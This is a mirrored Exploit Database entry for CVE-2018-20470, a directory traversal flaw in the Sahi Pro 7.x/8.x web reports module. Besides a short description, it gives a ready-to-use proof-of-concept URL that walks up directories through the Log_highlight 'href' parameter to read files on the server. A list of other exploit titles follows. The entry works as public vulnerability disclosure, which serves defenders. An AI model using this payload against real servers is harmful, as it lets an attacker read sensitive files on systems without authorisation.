Sahi pro 7.x/8.x – Directory Traversal

Exploit Database
15 阅读

作者： Goutham Madhwaraj

日期： 2019-06-18
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/47005/

# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20470


Description :

An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.

POC :

vulnerable URL :

''' replace the ip and port of the remote sahi pro server machine '''


http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected

last Exploits
Sahi pro 7.x/8.x – Directory Traversal的更多信息

Ciuis CRM 1.0.7 – SQL Injection：
ownCloud 4.0.x/4.5.x – ‘upload.php?Filename’ Remote Code Execution：
STVS ProVision 5.9.10 – Cross-Site Request Forgery (Add Admin)：
Cisco node-jos < 0.11.0 - Re-sign Tokens：
Fonality trixbox – ‘asterisk_info.php’ Directory Traversal：
PHP-Charts 1.0 – Code Execution：
Unicorn Router WB-3300NR – Cross-Site Request Forgery (Factory Reset/DNS Change)：
TaskFreak! 0.6.4 – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities：